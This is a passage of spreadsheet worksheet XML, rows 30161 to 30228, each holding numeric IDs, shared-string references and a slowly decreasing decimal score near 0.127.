      <c r="A30161" s="1">
        <v>14848.0</v>
      </c>
      <c r="B30161" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C30161" s="2" t="s">
        <v>28995</v>
      </c>
      <c r="D30161" s="2">
        <v>1.0</v>
      </c>
      <c r="E30161" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30161" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30162" ht="15.75" customHeight="1">
      <c r="A30162" s="1">
        <v>18932.0</v>
      </c>
      <c r="B30162" s="2">
        <v>5.4261811E7</v>
      </c>
      <c r="C30162" s="2" t="s">
        <v>28996</v>
      </c>
      <c r="D30162" s="2">
        <v>1.0</v>
      </c>
      <c r="E30162" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30162" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30163" ht="15.75" customHeight="1">
      <c r="A30163" s="1">
        <v>19140.0</v>
      </c>
      <c r="B30163" s="2">
        <v>5.48213E7</v>
      </c>
      <c r="C30163" s="2" t="s">
        <v>28997</v>
      </c>
      <c r="D30163" s="2">
        <v>1.0</v>
      </c>
      <c r="E30163" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30163" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30164" ht="15.75" customHeight="1">
      <c r="A30164" s="1">
        <v>19405.0</v>
      </c>
      <c r="B30164" s="2">
        <v>5.5580352E7</v>
      </c>
      <c r="C30164" s="2" t="s">
        <v>28998</v>
      </c>
      <c r="D30164" s="2">
        <v>1.0</v>
      </c>
      <c r="E30164" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30164" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30165" ht="15.75" customHeight="1">
      <c r="A30165" s="1">
        <v>19718.0</v>
      </c>
      <c r="B30165" s="2">
        <v>5.6578931E7</v>
      </c>
      <c r="C30165" s="2" t="s">
        <v>28999</v>
      </c>
      <c r="D30165" s="2">
        <v>1.0</v>
      </c>
      <c r="E30165" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30165" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30166" ht="15.75" customHeight="1">
      <c r="A30166" s="1">
        <v>19727.0</v>
      </c>
      <c r="B30166" s="2">
        <v>5.6620721E7</v>
      </c>
      <c r="C30166" s="2" t="s">
        <v>29000</v>
      </c>
      <c r="D30166" s="2">
        <v>1.0</v>
      </c>
      <c r="E30166" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30166" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30167" ht="15.75" customHeight="1">
      <c r="A30167" s="1">
        <v>19878.0</v>
      </c>
      <c r="B30167" s="2">
        <v>5.7249885E7</v>
      </c>
      <c r="C30167" s="2" t="s">
        <v>29001</v>
      </c>
      <c r="D30167" s="2">
        <v>1.0</v>
      </c>
      <c r="E30167" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30167" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30168" ht="15.75" customHeight="1">
      <c r="A30168" s="1">
        <v>19918.0</v>
      </c>
      <c r="B30168" s="2">
        <v>5.7404833E7</v>
      </c>
      <c r="C30168" s="2" t="s">
        <v>29002</v>
      </c>
      <c r="D30168" s="2">
        <v>1.0</v>
      </c>
      <c r="E30168" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30168" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30169" ht="15.75" customHeight="1">
      <c r="A30169" s="1">
        <v>20533.0</v>
      </c>
      <c r="B30169" s="2">
        <v>1.3220853E7</v>
      </c>
      <c r="C30169" s="2" t="s">
        <v>29003</v>
      </c>
      <c r="D30169" s="2">
        <v>1.0</v>
      </c>
      <c r="E30169" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30169" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30170" ht="15.75" customHeight="1">
      <c r="A30170" s="1">
        <v>21480.0</v>
      </c>
      <c r="B30170" s="2">
        <v>2.2980252E7</v>
      </c>
      <c r="C30170" s="2" t="s">
        <v>29004</v>
      </c>
      <c r="D30170" s="2">
        <v>1.0</v>
      </c>
      <c r="E30170" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30170" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30171" ht="15.75" customHeight="1">
      <c r="A30171" s="1">
        <v>22250.0</v>
      </c>
      <c r="B30171" s="2">
        <v>3.2780615E7</v>
      </c>
      <c r="C30171" s="2" t="s">
        <v>29005</v>
      </c>
      <c r="D30171" s="2">
        <v>1.0</v>
      </c>
      <c r="E30171" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30171" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30172" ht="15.75" customHeight="1">
      <c r="A30172" s="1">
        <v>25194.0</v>
      </c>
      <c r="B30172" s="2">
        <v>1.3196E7</v>
      </c>
      <c r="C30172" s="2" t="s">
        <v>29006</v>
      </c>
      <c r="D30172" s="2">
        <v>1.0</v>
      </c>
      <c r="E30172" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30172" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30173" ht="15.75" customHeight="1">
      <c r="A30173" s="1">
        <v>25302.0</v>
      </c>
      <c r="B30173" s="2">
        <v>1.341421E7</v>
      </c>
      <c r="C30173" s="2" t="s">
        <v>29007</v>
      </c>
      <c r="D30173" s="2">
        <v>1.0</v>
      </c>
      <c r="E30173" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30173" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30174" ht="15.75" customHeight="1">
      <c r="A30174" s="1">
        <v>25620.0</v>
      </c>
      <c r="B30174" s="2">
        <v>1.4423026E7</v>
      </c>
      <c r="C30174" s="2" t="s">
        <v>29008</v>
      </c>
      <c r="D30174" s="2">
        <v>1.0</v>
      </c>
      <c r="E30174" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30174" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30175" ht="15.75" customHeight="1">
      <c r="A30175" s="1">
        <v>25975.0</v>
      </c>
      <c r="B30175" s="2">
        <v>1.5292334E7</v>
      </c>
      <c r="C30175" s="2" t="s">
        <v>29009</v>
      </c>
      <c r="D30175" s="2">
        <v>1.0</v>
      </c>
      <c r="E30175" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30175" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30176" ht="15.75" customHeight="1">
      <c r="A30176" s="1">
        <v>27776.0</v>
      </c>
      <c r="B30176" s="2">
        <v>2.3117882E7</v>
      </c>
      <c r="C30176" s="2" t="s">
        <v>29010</v>
      </c>
      <c r="D30176" s="2">
        <v>1.0</v>
      </c>
      <c r="E30176" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30176" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30177" ht="15.75" customHeight="1">
      <c r="A30177" s="1">
        <v>29594.0</v>
      </c>
      <c r="B30177" s="2">
        <v>3.3537841E7</v>
      </c>
      <c r="C30177" s="2" t="s">
        <v>29011</v>
      </c>
      <c r="D30177" s="2">
        <v>1.0</v>
      </c>
      <c r="E30177" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30177" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30178" ht="15.75" customHeight="1">
      <c r="A30178" s="1">
        <v>29656.0</v>
      </c>
      <c r="B30178" s="2">
        <v>3.3874679E7</v>
      </c>
      <c r="C30178" s="2" t="s">
        <v>29012</v>
      </c>
      <c r="D30178" s="2">
        <v>1.0</v>
      </c>
      <c r="E30178" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30178" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30179" ht="15.75" customHeight="1">
      <c r="A30179" s="1">
        <v>31428.0</v>
      </c>
      <c r="B30179" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C30179" s="2" t="s">
        <v>29013</v>
      </c>
      <c r="D30179" s="2">
        <v>1.0</v>
      </c>
      <c r="E30179" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30179" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30180" ht="15.75" customHeight="1">
      <c r="A30180" s="1">
        <v>31811.0</v>
      </c>
      <c r="B30180" s="2">
        <v>5251015.0</v>
      </c>
      <c r="C30180" s="2" t="s">
        <v>29014</v>
      </c>
      <c r="D30180" s="2">
        <v>1.0</v>
      </c>
      <c r="E30180" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30180" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="30181" ht="15.75" customHeight="1">
      <c r="A30181" s="1">
        <v>12938.0</v>
      </c>
      <c r="B30181" s="2">
        <v>3.2361436E7</v>
      </c>
      <c r="C30181" s="2" t="s">
        <v>29015</v>
      </c>
      <c r="D30181" s="2">
        <v>1.0</v>
      </c>
      <c r="E30181" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30181" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="30182" ht="15.75" customHeight="1">
      <c r="A30182" s="1">
        <v>12953.0</v>
      </c>
      <c r="B30182" s="2">
        <v>3.2394478E7</v>
      </c>
      <c r="C30182" s="2" t="s">
        <v>29015</v>
      </c>
      <c r="D30182" s="2">
        <v>1.0</v>
      </c>
      <c r="E30182" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30182" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="30183" ht="15.75" customHeight="1">
      <c r="A30183" s="1">
        <v>17547.0</v>
      </c>
      <c r="B30183" s="2">
        <v>5.0165057E7</v>
      </c>
      <c r="C30183" s="2" t="s">
        <v>29016</v>
      </c>
      <c r="D30183" s="2">
        <v>1.0</v>
      </c>
      <c r="E30183" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30183" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="30184" ht="15.75" customHeight="1">
      <c r="A30184" s="1">
        <v>17787.0</v>
      </c>
      <c r="B30184" s="2">
        <v>5.0789862E7</v>
      </c>
      <c r="C30184" s="2" t="s">
        <v>29017</v>
      </c>
      <c r="D30184" s="2">
        <v>1.0</v>
      </c>
      <c r="E30184" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30184" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="30185" ht="15.75" customHeight="1">
      <c r="A30185" s="1">
        <v>17925.0</v>
      </c>
      <c r="B30185" s="2">
        <v>5.1163558E7</v>
      </c>
      <c r="C30185" s="2" t="s">
        <v>29018</v>
      </c>
      <c r="D30185" s="2">
        <v>1.0</v>
      </c>
      <c r="E30185" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30185" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="30186" ht="15.75" customHeight="1">
      <c r="A30186" s="1">
        <v>17989.0</v>
      </c>
      <c r="B30186" s="2">
        <v>5.1392529E7</v>
      </c>
      <c r="C30186" s="2" t="s">
        <v>29019</v>
      </c>
      <c r="D30186" s="2">
        <v>1.0</v>
      </c>
      <c r="E30186" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30186" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="30187" ht="15.75" customHeight="1">
      <c r="A30187" s="1">
        <v>24612.0</v>
      </c>
      <c r="B30187" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C30187" s="2" t="s">
        <v>29020</v>
      </c>
      <c r="D30187" s="2">
        <v>1.0</v>
      </c>
      <c r="E30187" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30187" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="30188" ht="15.75" customHeight="1">
      <c r="A30188" s="1">
        <v>503.0</v>
      </c>
      <c r="B30188" s="2">
        <v>1.805203E7</v>
      </c>
      <c r="C30188" s="2" t="s">
        <v>29021</v>
      </c>
      <c r="D30188" s="2">
        <v>1.0</v>
      </c>
      <c r="E30188" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30188" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="30189" ht="15.75" customHeight="1">
      <c r="A30189" s="1">
        <v>9069.0</v>
      </c>
      <c r="B30189" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C30189" s="2" t="s">
        <v>29022</v>
      </c>
      <c r="D30189" s="2">
        <v>1.0</v>
      </c>
      <c r="E30189" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30189" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="30190" ht="15.75" customHeight="1">
      <c r="A30190" s="1">
        <v>11022.0</v>
      </c>
      <c r="B30190" s="2">
        <v>1.7883689E7</v>
      </c>
      <c r="C30190" s="2" t="s">
        <v>29023</v>
      </c>
      <c r="D30190" s="2">
        <v>1.0</v>
      </c>
      <c r="E30190" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30190" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="30191" ht="15.75" customHeight="1">
      <c r="A30191" s="1">
        <v>16096.0</v>
      </c>
      <c r="B30191" s="2">
        <v>4.5387377E7</v>
      </c>
      <c r="C30191" s="2" t="s">
        <v>29024</v>
      </c>
      <c r="D30191" s="2">
        <v>1.0</v>
      </c>
      <c r="E30191" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30191" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="30192" ht="15.75" customHeight="1">
      <c r="A30192" s="1">
        <v>16893.0</v>
      </c>
      <c r="B30192" s="2">
        <v>4.8048465E7</v>
      </c>
      <c r="C30192" s="2" t="s">
        <v>29025</v>
      </c>
      <c r="D30192" s="2">
        <v>1.0</v>
      </c>
      <c r="E30192" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30192" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="30193" ht="15.75" customHeight="1">
      <c r="A30193" s="1">
        <v>31077.0</v>
      </c>
      <c r="B30193" s="2">
        <v>4.8316246E7</v>
      </c>
      <c r="C30193" s="2" t="s">
        <v>29026</v>
      </c>
      <c r="D30193" s="2">
        <v>1.0</v>
      </c>
      <c r="E30193" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30193" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="30194" ht="15.75" customHeight="1">
      <c r="A30194" s="1">
        <v>12517.0</v>
      </c>
      <c r="B30194" s="2">
        <v>2.9672398E7</v>
      </c>
      <c r="C30194" s="2" t="s">
        <v>29027</v>
      </c>
      <c r="D30194" s="2">
        <v>1.0</v>
      </c>
      <c r="E30194" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30194" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="30195" ht="15.75" customHeight="1">
      <c r="A30195" s="1">
        <v>21980.0</v>
      </c>
      <c r="B30195" s="2">
        <v>2.9357494E7</v>
      </c>
      <c r="C30195" s="2" t="s">
        <v>29028</v>
      </c>
      <c r="D30195" s="2">
        <v>1.0</v>
      </c>
      <c r="E30195" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30195" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="30196" ht="15.75" customHeight="1">
      <c r="A30196" s="1">
        <v>25245.0</v>
      </c>
      <c r="B30196" s="2">
        <v>1.3381641E7</v>
      </c>
      <c r="C30196" s="2" t="s">
        <v>29029</v>
      </c>
      <c r="D30196" s="2">
        <v>1.0</v>
      </c>
      <c r="E30196" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30196" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="30197" ht="15.75" customHeight="1">
      <c r="A30197" s="1">
        <v>15653.0</v>
      </c>
      <c r="B30197" s="2">
        <v>4.3633248E7</v>
      </c>
      <c r="C30197" s="2" t="s">
        <v>29030</v>
      </c>
      <c r="D30197" s="2">
        <v>1.0</v>
      </c>
      <c r="E30197" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30197" s="2">
        <v>0.1273946360153256</v>
      </c>
    </row>
    <row r="30198" ht="15.75" customHeight="1">
      <c r="A30198" s="1">
        <v>18361.0</v>
      </c>
      <c r="B30198" s="2">
        <v>5.2546408E7</v>
      </c>
      <c r="C30198" s="2" t="s">
        <v>29031</v>
      </c>
      <c r="D30198" s="2">
        <v>1.0</v>
      </c>
      <c r="E30198" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30198" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="30199" ht="15.75" customHeight="1">
      <c r="A30199" s="1">
        <v>31851.0</v>
      </c>
      <c r="B30199" s="2">
        <v>5.2758669E7</v>
      </c>
      <c r="C30199" s="2" t="s">
        <v>28911</v>
      </c>
      <c r="D30199" s="2">
        <v>1.0</v>
      </c>
      <c r="E30199" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30199" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="30200" ht="15.75" customHeight="1">
      <c r="A30200" s="1">
        <v>32595.0</v>
      </c>
      <c r="B30200" s="2">
        <v>5802568.0</v>
      </c>
      <c r="C30200" s="2" t="s">
        <v>29032</v>
      </c>
      <c r="D30200" s="2">
        <v>1.0</v>
      </c>
      <c r="E30200" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30200" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="30201" ht="15.75" customHeight="1">
      <c r="A30201" s="1">
        <v>32200.0</v>
      </c>
      <c r="B30201" s="2">
        <v>5477011.0</v>
      </c>
      <c r="C30201" s="2" t="s">
        <v>29033</v>
      </c>
      <c r="D30201" s="2">
        <v>1.0</v>
      </c>
      <c r="E30201" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30201" s="2">
        <v>0.1271043771043771</v>
      </c>
    </row>
    <row r="30202" ht="15.75" customHeight="1">
      <c r="A30202" s="1">
        <v>7663.0</v>
      </c>
      <c r="B30202" s="2">
        <v>5.1819957E7</v>
      </c>
      <c r="C30202" s="2" t="s">
        <v>29034</v>
      </c>
      <c r="D30202" s="2">
        <v>1.0</v>
      </c>
      <c r="E30202" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30202" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="30203" ht="15.75" customHeight="1">
      <c r="A30203" s="1">
        <v>19715.0</v>
      </c>
      <c r="B30203" s="2">
        <v>5.6565326E7</v>
      </c>
      <c r="C30203" s="2" t="s">
        <v>29035</v>
      </c>
      <c r="D30203" s="2">
        <v>1.0</v>
      </c>
      <c r="E30203" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30203" s="2">
        <v>0.1268518518518518</v>
      </c>
    </row>
    <row r="30204" ht="15.75" customHeight="1">
      <c r="A30204" s="1">
        <v>13138.0</v>
      </c>
      <c r="B30204" s="2">
        <v>3.3716584E7</v>
      </c>
      <c r="C30204" s="2" t="s">
        <v>29036</v>
      </c>
      <c r="D30204" s="2">
        <v>1.0</v>
      </c>
      <c r="E30204" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30204" s="2">
        <v>0.1266339869281047</v>
      </c>
    </row>
    <row r="30205" ht="15.75" customHeight="1">
      <c r="A30205" s="1">
        <v>11.0</v>
      </c>
      <c r="B30205" s="2">
        <v>1.0306158E7</v>
      </c>
      <c r="C30205" s="2" t="s">
        <v>29037</v>
      </c>
      <c r="D30205" s="2">
        <v>1.0</v>
      </c>
      <c r="E30205" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30205" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="30206" ht="15.75" customHeight="1">
      <c r="A30206" s="1">
        <v>3217.0</v>
      </c>
      <c r="B30206" s="2">
        <v>3.7302925E7</v>
      </c>
      <c r="C30206" s="2" t="s">
        <v>29038</v>
      </c>
      <c r="D30206" s="2">
        <v>1.0</v>
      </c>
      <c r="E30206" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30206" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="30207" ht="15.75" customHeight="1">
      <c r="A30207" s="1">
        <v>17093.0</v>
      </c>
      <c r="B30207" s="2">
        <v>4.8663696E7</v>
      </c>
      <c r="C30207" s="2" t="s">
        <v>29039</v>
      </c>
      <c r="D30207" s="2">
        <v>1.0</v>
      </c>
      <c r="E30207" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30207" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="30208" ht="15.75" customHeight="1">
      <c r="A30208" s="1">
        <v>18021.0</v>
      </c>
      <c r="B30208" s="2">
        <v>5.1519213E7</v>
      </c>
      <c r="C30208" s="2" t="s">
        <v>29040</v>
      </c>
      <c r="D30208" s="2">
        <v>1.0</v>
      </c>
      <c r="E30208" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30208" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="30209" ht="15.75" customHeight="1">
      <c r="A30209" s="1">
        <v>28936.0</v>
      </c>
      <c r="B30209" s="2">
        <v>2.9617443E7</v>
      </c>
      <c r="C30209" s="2" t="s">
        <v>29041</v>
      </c>
      <c r="D30209" s="2">
        <v>1.0</v>
      </c>
      <c r="E30209" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30209" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="30210" ht="15.75" customHeight="1">
      <c r="A30210" s="1">
        <v>119.0</v>
      </c>
      <c r="B30210" s="2">
        <v>1.2995404E7</v>
      </c>
      <c r="C30210" s="2" t="s">
        <v>29042</v>
      </c>
      <c r="D30210" s="2">
        <v>1.0</v>
      </c>
      <c r="E30210" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30210" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="30211" ht="15.75" customHeight="1">
      <c r="A30211" s="1">
        <v>2045.0</v>
      </c>
      <c r="B30211" s="2">
        <v>3.0925789E7</v>
      </c>
      <c r="C30211" s="2" t="s">
        <v>29043</v>
      </c>
      <c r="D30211" s="2">
        <v>1.0</v>
      </c>
      <c r="E30211" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30211" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="30212" ht="15.75" customHeight="1">
      <c r="A30212" s="1">
        <v>2837.0</v>
      </c>
      <c r="B30212" s="2">
        <v>3.5439264E7</v>
      </c>
      <c r="C30212" s="2" t="s">
        <v>29044</v>
      </c>
      <c r="D30212" s="2">
        <v>1.0</v>
      </c>
      <c r="E30212" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30212" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="30213" ht="15.75" customHeight="1">
      <c r="A30213" s="1">
        <v>16846.0</v>
      </c>
      <c r="B30213" s="2">
        <v>4.7910053E7</v>
      </c>
      <c r="C30213" s="2" t="s">
        <v>29045</v>
      </c>
      <c r="D30213" s="2">
        <v>1.0</v>
      </c>
      <c r="E30213" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30213" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="30214" ht="15.75" customHeight="1">
      <c r="A30214" s="1">
        <v>19452.0</v>
      </c>
      <c r="B30214" s="2">
        <v>5.573372E7</v>
      </c>
      <c r="C30214" s="2" t="s">
        <v>29046</v>
      </c>
      <c r="D30214" s="2">
        <v>1.0</v>
      </c>
      <c r="E30214" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30214" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="30215" ht="15.75" customHeight="1">
      <c r="A30215" s="1">
        <v>24605.0</v>
      </c>
      <c r="B30215" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C30215" s="2" t="s">
        <v>29047</v>
      </c>
      <c r="D30215" s="2">
        <v>1.0</v>
      </c>
      <c r="E30215" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30215" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="30216" ht="15.75" customHeight="1">
      <c r="A30216" s="1">
        <v>853.0</v>
      </c>
      <c r="B30216" s="2">
        <v>2.1716426E7</v>
      </c>
      <c r="C30216" s="2" t="s">
        <v>29048</v>
      </c>
      <c r="D30216" s="2">
        <v>1.0</v>
      </c>
      <c r="E30216" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30216" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30217" ht="15.75" customHeight="1">
      <c r="A30217" s="1">
        <v>6061.0</v>
      </c>
      <c r="B30217" s="2">
        <v>4.761681E7</v>
      </c>
      <c r="C30217" s="2" t="s">
        <v>29049</v>
      </c>
      <c r="D30217" s="2">
        <v>1.0</v>
      </c>
      <c r="E30217" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30217" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30218" ht="15.75" customHeight="1">
      <c r="A30218" s="1">
        <v>10774.0</v>
      </c>
      <c r="B30218" s="2">
        <v>1.5610481E7</v>
      </c>
      <c r="C30218" s="2" t="s">
        <v>29050</v>
      </c>
      <c r="D30218" s="2">
        <v>1.0</v>
      </c>
      <c r="E30218" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30218" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30219" ht="15.75" customHeight="1">
      <c r="A30219" s="1">
        <v>12530.0</v>
      </c>
      <c r="B30219" s="2">
        <v>2.9789333E7</v>
      </c>
      <c r="C30219" s="2" t="s">
        <v>29051</v>
      </c>
      <c r="D30219" s="2">
        <v>1.0</v>
      </c>
      <c r="E30219" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30219" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30220" ht="15.75" customHeight="1">
      <c r="A30220" s="1">
        <v>12811.0</v>
      </c>
      <c r="B30220" s="2">
        <v>3.1577918E7</v>
      </c>
      <c r="C30220" s="2" t="s">
        <v>29052</v>
      </c>
      <c r="D30220" s="2">
        <v>1.0</v>
      </c>
      <c r="E30220" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30220" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30221" ht="15.75" customHeight="1">
      <c r="A30221" s="1">
        <v>15572.0</v>
      </c>
      <c r="B30221" s="2">
        <v>4.3430923E7</v>
      </c>
      <c r="C30221" s="2" t="s">
        <v>29053</v>
      </c>
      <c r="D30221" s="2">
        <v>1.0</v>
      </c>
      <c r="E30221" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30221" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30222" ht="15.75" customHeight="1">
      <c r="A30222" s="1">
        <v>24271.0</v>
      </c>
      <c r="B30222" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C30222" s="2" t="s">
        <v>29054</v>
      </c>
      <c r="D30222" s="2">
        <v>1.0</v>
      </c>
      <c r="E30222" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30222" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30223" ht="15.75" customHeight="1">
      <c r="A30223" s="1">
        <v>27116.0</v>
      </c>
      <c r="B30223" s="2">
        <v>2.0647048E7</v>
      </c>
      <c r="C30223" s="2" t="s">
        <v>29055</v>
      </c>
      <c r="D30223" s="2">
        <v>1.0</v>
      </c>
      <c r="E30223" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30223" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30224" ht="15.75" customHeight="1">
      <c r="A30224" s="1">
        <v>29523.0</v>
      </c>
      <c r="B30224" s="2">
        <v>3.2780614E7</v>
      </c>
      <c r="C30224" s="2" t="s">
        <v>29056</v>
      </c>
      <c r="D30224" s="2">
        <v>1.0</v>
      </c>
      <c r="E30224" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30224" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30225" ht="15.75" customHeight="1">
      <c r="A30225" s="1">
        <v>29645.0</v>
      </c>
      <c r="B30225" s="2">
        <v>3.3819752E7</v>
      </c>
      <c r="C30225" s="2" t="s">
        <v>29057</v>
      </c>
      <c r="D30225" s="2">
        <v>1.0</v>
      </c>
      <c r="E30225" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30225" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="30226" ht="15.75" customHeight="1">
      <c r="A30226" s="1">
        <v>8823.0</v>
      </c>
      <c r="B30226" s="2">
        <v>5.4639343E7</v>
      </c>
      <c r="C30226" s="2" t="s">
        <v>29058</v>
      </c>
      <c r="D30226" s="2">
        <v>1.0</v>
      </c>
      <c r="E30226" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30226" s="2">
        <v>0.1258790436005626</v>
      </c>
    </row>
    <row r="30227" ht="15.75" customHeight="1">
      <c r="A30227" s="1">
        <v>440.0</v>
      </c>
      <c r="B30227" s="2">
        <v>1.7021815E7</v>
      </c>
      <c r="C30227" s="2" t="s">
        <v>29059</v>
      </c>
      <c r="D30227" s="2">
        <v>1.0</v>
      </c>
      <c r="E30227" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30227" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="30228" ht="15.75" customHeight="1">
